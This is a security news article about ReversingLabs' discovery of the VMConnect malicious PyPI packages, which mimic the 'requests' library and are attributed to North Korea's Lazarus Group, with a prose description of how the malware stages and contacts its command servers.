ReversingLabs spotted “VMConnect” in early August, a malicious supply chain campaign with two dozen rogue Python packages on PyPI.
It’s been observed that these packages mimicked the following known open-source Python tools:-
Cybersecurity researchers at ReversingLabs recently identified that a North Korean hacker group is actively deploying malicious versions of Python Packages in the PyPI repository.
The security analysts analyzed all the malicious packages, and after successfully decrypting the malicious packages, they linked their roots to Labyrinth Chollima, a branch of the renowned North Korean state-sponsored group Lazarus.
Recent years witnessed malicious actors imitating open-source packages, using tactics like typosquatting to trick busy developers into installing malware.
Here below, we have mentioned all the malicious packages that the security experts identified:-
The first of the three new packages pretends to be a table editing tool, while the others imitate the ‘requests’ Python library, adding ‘plus’ and ‘pro’ to seem like enhanced legitimate versions.
The malicious actors used evasion tactics like typosquatting and mimicked the ‘requests’ package, copying its description and files without any additions.
The malicious packages in the “__init__.py” file were only altered and modified to launch a thread executing a function from the “cookies.py” file after the addition of a few lines of code.
The cookies.py file was altered with malicious functions to gather machine data, sending it via POST to a C2 server URL. It then retrieves a token via a GET HTTP request to another C2 server URL.
The infected host receives a double-encrypted Python module with execution parameters, decoding it and downloading the next malware stage from a provided URL.
Similar to the previous VMConnect campaign, the C2 server waited for suitable targets, withholding additional commands, making campaign assessment challenging.
While investigating VMConnect, ReversingLabs aimed to connect it with other malware campaigns, uncovering hints linking it to Lazarus Group, a North Korean APT group.
Further investigation found the py_QRcode package mentioned in a July 2023 JPCERT report (https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html), but it was never on PyPI. This raises questions about how the malware reached victims despite being tied to this package.
Code similarities between VMConnect and JPCERT/CC findings link both to the Lazarus Group, confirming North Korean state sponsorship.
Command and control (C2) domains and IP address:
PyPI packages:
Keep informed about the latest Cyber Security News by following us on Google News, Linkedin, Twitter, and Facebook.
We're currently living in an age where digital threats loom large. Among these, ransomware has…
Attackers are exploiting the recently discovered critical security vulnerability tracked as (CVE-2023-46604) affecting Apache ActiveMQ…
Media reports highlight the sale of LLMs like WormGPT and FraudGPT on underground forums. Fears…
An open-source security scanner, developed by Git Hub user Adam Swanda, was released to explore…
One of Slovenia's major power providers, HSE, has recently fallen victim to a significant cyberattack.…
In the labyrinthine landscape of cyber threats, the Trend Micro Managed XDR team has uncovered…